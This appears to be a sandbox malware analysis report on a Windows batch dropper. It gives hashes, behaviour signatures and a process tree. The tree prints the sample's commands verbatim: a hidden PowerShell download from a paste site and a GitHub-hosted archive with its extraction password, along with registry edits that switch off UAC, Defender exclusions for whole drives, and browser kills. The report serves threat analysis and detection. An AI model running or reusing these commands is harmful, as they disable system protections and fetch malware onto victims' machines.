Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    31/12/2024, 03:08

General

  • Target

    f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat

  • Size

    41KB

  • MD5

    6b9cf24f2b691606642bd18bf2227a62

  • SHA1

    046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc

  • SHA256

    f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1

  • SHA512

    db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e

  • SSDEEP

    768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://paste.fo/raw/a1af5a4d0301

Signatures

  • UAC bypass 3 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

    Possible Turn off User Account Control's privilege elevation for standard users.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 12 IoCs
  • Modifies Internet Explorer settings 1 TTPs 26 IoCs
  • Modifies registry key 1 TTPs 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2584
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2412
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1.bat'))"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2832
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2332
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • Modifies registry key
            PID:2872
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
            5⤵
            • Hijack Execution Flow: Executable Installer File Permissions Weakness
            • Modifies registry key
            PID:2672
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:2736
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:2660
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:2784
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:2632
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:1804
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:2004
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:352
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
            5⤵
            • Modifies registry key
            PID:1640
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • Modifies registry key
            PID:2392
          • C:\Windows\system32\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • Modifies registry key
            PID:2516
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1316
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1936
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1452
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2908
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2488
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2976
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2636 CREDAT:275457 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1484
      • C:\Windows\system32\timeout.exe
        timeout /t 9
        3⤵
        • Delays execution with timeout.exe
        PID:1600
      • C:\Program Files\7-Zip\7z.exe
        "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOC.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2644
      • C:\Windows\system32\timeout.exe
        timeout /t 9
        3⤵
        • Delays execution with timeout.exe
        PID:2788
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM chrome.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM firefox.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1632
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM msedge.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1392
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM iexplore.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2288
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM opera.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:780
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM safari.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2140
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM brave.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:688
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM vivaldi.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1068
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM epic.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1724
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM yandex.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2336
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM tor.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2152
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM CMD.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1584

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2462ca0181d56024d4f2cbddd415a2f4

    SHA1

    6a34cfdb689a005918251cdf808788349a4f43f4

    SHA256

    0e873347a4fa5f8b8667eec21cc43c3274a937a4e814016766d021ee65e38dbe

    SHA512

    8388ebe9a431fb42d2b1d0ebc9302c950cdc04dfe1bd3bbe5b9fd216ae30cdf83d91b6aa52c1e4e6fd633e4838636e06a89b5801c7bf92c8fe0bffa54bd7ac45

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    31a3ce7b37c4fa62668447a12e95c7c7

    SHA1

    25cc6b9be952c486d7a44f2f4fcfd1a5a64389ce

    SHA256

    1a4e1bd6a33e8c09880150ff706df3be3913b37a2daf2a0156a6ff2c1627902b

    SHA512

    6a3e51f94949fa529f005b5efcf8ebb59bb46d0c611e1a0dd44e34eae0c87da327a6802b6c3c0d31c28f289879a67831e9edc0f8f7f4c855f727d73986068c94

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    4a5ee36d49dc15a4fff99a98eb700e7f

    SHA1

    744ca763a1da1e1db10086a3191065e8d06dd8f2

    SHA256

    1e7891601160af45287d3d9d916ee4528a3f8af4ed292673ac057ef987f40b8c

    SHA512

    e4c49868c55539f3ea3d919dfb7f6051956ba967da3c2d7db736805bf4fb50b799c01cc34d1b87ec03780b89c3fa6e87b1d7d5ec8df9463fcc7d41a80a98cf38

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    5c0080fa1cd8e0ea8cd984f8e9671272

    SHA1

    c340b1c633929b3a3aa31f02cc0a5de0b7aaa6c0

    SHA256

    e361b74b450860d17c3a697d2648e5c11ed95c25b7dfe6ef6b1d41263e6276b8

    SHA512

    7de9f050c4ffa051a77f871732b1add885e60abf1c734c4eeb20d036308e1207e9322cb1436aed77c8e57e991743d969a8dc60ce42bbbea594964a27b5903eef

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    765f590fca6ea1ce3bb53d11fc26eaaf

    SHA1

    ba7273ecc4e45584ea223876e8940a892824b8d1

    SHA256

    0213c71d2cdb3baeb0c1a3009dc73e3f8ceb137d4f309aa559d42a22429a3f10

    SHA512

    065099046c8e3005fc611ffb0ece4c8fe04e7ab8e7cf961b89505de062341b13f515de31d52f5674a6b4073a62fde820756bd6acd5a78f1f28011c681bf5617a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c707a8364997db2eb056bc7707e6a53c

    SHA1

    8c9da8bbef0bccb9f6cec4a62a89ce361a7645f6

    SHA256

    bd780f84d54cc340e0f3eaf5d8e748545b3290396f503fdc994d7e944238441a

    SHA512

    62231958c9cabde01020c8b9cb681e987e401f511493e8cb27d0fd8d1f0c6e85e1384d260859d610121cee7f5e0839a47799019bec74099f5561fa6ddf79df39

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    6181534225162f62f3a04b9e7fbf5e47

    SHA1

    082c515fb6746ae43bd47afcbf39994c7ebaa3a3

    SHA256

    8a7213701e0bf1f10a237eb3a5c4bcba9089e48e7252f4509911f2e76ddd1cd5

    SHA512

    f3959e416fba4518704fb75d8c384ff53c792fce7cf663acf0aa99b0c8cab451afc332dd57b7687a0512666ae3055878805729f63bfcd2ba0c22ad56291eafbe

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    9d995dd57ade364dfe11e78b96ed5cb3

    SHA1

    f02c8f4b4a3a0b9852c61806a1e5b9021d3d3ed8

    SHA256

    4172d69de61cb0cb2758abeebe6bb3f5e6e962bd1963b9d7d8cab9ec3109b4b0

    SHA512

    b40ed3840c382865116c7d61a47942fe1a53752d19493a5338f95e4972725b1ff98f4f454296b643654a9026690424f6da43de6fa93a985f8e3feacb55e1b4c6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    82ac5b0369c6e13d22b421d065cda6a6

    SHA1

    96f604096e4bd8cebc102435dd4130d3bf8059ec

    SHA256

    7b4fbdb904d7ce1ca13b114a1f6c19d15334a2c08495670c32bbe45765c5c66b

    SHA512

    3b47b021428a0cdb3f112a4c7faa200ed5b9838de4ddcb5f9a35d775790571386acc5faa7b8b890ead6992c288f54526e8cb89f75d7dd35d3f7171b6a537d069

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    5507cbd4093894c1e70bfb422ce2b0ee

    SHA1

    846c50e3e747810048d6865c98393fb13e570b59

    SHA256

    d4e7f21101ddc9fce3111bf532753dac8f998f1cccd983771d428e2c6cf4836f

    SHA512

    e5b94e6a94a7502ebc173d34d60977d604004cc013a602c1ac81da2c40172dc3ea6ac8b5beffdef283427044b804a0e6f87f313a257c7370e0a83cc785f9167f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2edbf6d4c41ec8778f5e3ec6907468d1

    SHA1

    3d115bdd077d57593b628b38b28abf90b2d18164

    SHA256

    804374bea20addcd1376bab91abde6f06f7278cba244bab7a2e9bb1cdd386f2b

    SHA512

    518de1d95b2a11fd69b44a5ea2d721e8d02661c954264e66aaf44133ad26e219f9cf2335e50a8c33bbc15cbe71e373c7f28c87ade42b1f5a126dc3c76eea860c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    fbe337ad4283d1661daaa7d230031720

    SHA1

    107cb22faaf0f078090adeb13bfe84587fb9500d

    SHA256

    047c7ab240f7399d3274b1be1c45d7c85cfa4c00c11df040193501363f3837cc

    SHA512

    70ed0816ea05ab6d9c955f7d5daf4bb16305cca3b48c1c45e1e0afd4828b2509fd323b4d42b789ff4caf293e305fd0b25227f0007b159ace143925eea85679b3

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    c3e5933e16df9038e466e3db71a8d1fe

    SHA1

    6003f84c84bc15ea0a4ffabfa4a992297b783a86

    SHA256

    43718c1ab0f8365d62980e4c7e042973aecd2c673cb660d6eb079f9ff2265d83

    SHA512

    78209909b2228cabbf547a2f7a8375852a92bc709e3017f665e7cc8b3c415dd2aba87244a8dd855a8edbfc9d547dc945ff6fcacf788f363c84857e6565feef4d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    8bf1c6238838300b82c9ae11daf8b083

    SHA1

    56df25c245a6ab62e25f08edb66f16e8332caabb

    SHA256

    4fc806c4af74cb789c83dc9ebc4d80436d40eb08b308a5799d949af100e2a103

    SHA512

    723ee3fc8e03efab9dfc729c1d6d63e6a8893a629a985cec7fbafd33271fc9f8e34dd56a66145c9bb978bda4ecf7f5302c85bba01168fbafcb421f6b37a23a74

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    81216877fea990119549457b91e2689d

    SHA1

    f340261aff18fccfdf4040f3d08738c7a97b2e45

    SHA256

    c1dde89e458f4ba50b4e1894837e4828256da7eb37cef157caf7b4b0bfcd2876

    SHA512

    0ebdc7e046e74c6c2a2692ade880720cf57fbebf23419d34952ec34b9b36186bdf77e2ee24eb2ec7a5be3fb8759dfea9f967d33309a6a8c388c3a6db7ca422cf

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    19206a9c7788b7ba082b8eb47c812f26

    SHA1

    9787837375deb875f32fa6d1bec84d239926e4af

    SHA256

    8d77a64b0b0a4fbf3557067a8e527b94d282afcf626e1b0567a75ce7ca5e742f

    SHA512

    6a9bccdade02089afa3be5173b7cd8b83014ce37b01c16ff9a6729dfef9255cccf3711e6f69027ac91738ecd5067a4f44fa1d5d829d75aadb526e0c2725deb7a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    54d0aa79f9cab89579f77569cfa4c263

    SHA1

    71fc9cacc0e471680c5059ae9aa84bb497f4610c

    SHA256

    b7e9747e07e8e2c8edc9ae49526201cc2a4e9ec3309c2b5bac7a6317e8f2ad32

    SHA512

    b4aa3453a5fc88b89f7dfa01e3f9ba125f58ccd9cd861cc92715d0982bd06a8dc026e39efa7ba327965dec63b67c9550ecf50cacd665d359324e1bdbce55d64e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    9fa9ea8632ef1c18faab0d00c9328e51

    SHA1

    9d898191783f8e0601ec32cd458ab942920ce146

    SHA256

    f32ebcbf1bfd88c9e47089c82ce1ee77937f7b72f5cd76b42dc1df66a47c3972

    SHA512

    800281c401d2f0ed73e1988b489b8fa0d175793cded69825a67757173509ea6e92c9d43d5f9fdb6706dde04a713343f2aa065b719e821f8e6871c38f22e2fb43

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    1bfc70e43e4c7b18de04a00757927fd9

    SHA1

    35b1d1ebe2f0da81e09985a7e8fa2453ab57eea0

    SHA256

    34b7bd17e7d41540d6905a61907d910ed000843fac6245d416f1045bf065f881

    SHA512

    ba93d86bcf2f6c5ca5dcc7e2bf29c753b1c2a9276248ec652afa18b2962f384c5d82fa52dd5f640c60636f9ee282733151926cc7bfe5e632531220830bd199cd

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    2b9a2df77e152da3c35f5bd17dc839d4

    SHA1

    febefc87a1986e913c8c5942dcf516373a9f0844

    SHA256

    b6c3cd8f12850305a79516f9acf267ec8259668a1d91f13e809342394ede87ba

    SHA512

    1a08273ea6b9a0b660da0ef375e23a91b614bbf1c9e25d6c7c4f974fa7f900d13617fcad28a247739bcd50eacc4bbe7fea70292bd3cd8c8c1b43f1d4df650574

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    313b5d6fe283170647aaaae9022367d7

    SHA1

    cab69505a73a592127f260b2bce74b569226758e

    SHA256

    e6f10d9b7621baa5de1a006bb3468dd3f1b6f68b3240a8396645305195fa8949

    SHA512

    196be2d5a37c4da1d268e7dd5c1eed016535f0f3e168d29c5b692586bb3c81f87e0ac94723a37179a227cf1c5580f737ef74027973ec3658b193477ab82ce5fd

  • C:\Users\Admin\AppData\Local\Temp\BatchByloadStartHid.bat

    Filesize

    1KB

    MD5

    45a66afa3b07b3143f0d0c3515898bae

    SHA1

    cc5baf0c4d2fc0b034974786f20087e058915693

    SHA256

    8a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6

    SHA512

    04aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f

  • C:\Users\Admin\AppData\Local\Temp\CabEF9E.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\TarF01E.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    ec7fd46e4306fb1ce0941f48a06c266d

    SHA1

    0f1005b6c5a62f5f341710ff04c5ff73d9b9f898

    SHA256

    8f666442a7f7a2042663a51bbee2b8e5c42919890a190eea6e56d7860111eee9

    SHA512

    14612df97dc37abdde72edfbac48a5221b8343cedb433f33069e9738026fb8db10628dece56a81b92ff4ec8e08e5f8342d24668bd0cbf73c0e56d0b9c2a50f93

  • memory/1316-49-0x000000001B500000-0x000000001B7E2000-memory.dmp

    Filesize

    2.9MB

  • memory/1316-50-0x0000000001F00000-0x0000000001F08000-memory.dmp

    Filesize

    32KB

  • memory/1936-57-0x000000001B470000-0x000000001B752000-memory.dmp

    Filesize

    2.9MB

  • memory/1936-58-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB

  • memory/2068-8-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2068-4-0x000007FEF582E000-0x000007FEF582F000-memory.dmp

    Filesize

    4KB

  • memory/2068-5-0x000000001B690000-0x000000001B972000-memory.dmp

    Filesize

    2.9MB

  • memory/2068-7-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2068-6-0x0000000002350000-0x0000000002358000-memory.dmp

    Filesize

    32KB

  • memory/2068-9-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2068-10-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2068-12-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

    Filesize

    9.6MB

  • memory/2832-18-0x000000001B640000-0x000000001B922000-memory.dmp

    Filesize

    2.9MB

  • memory/2832-19-0x00000000021A0000-0x00000000021A8000-memory.dmp

    Filesize

    32KB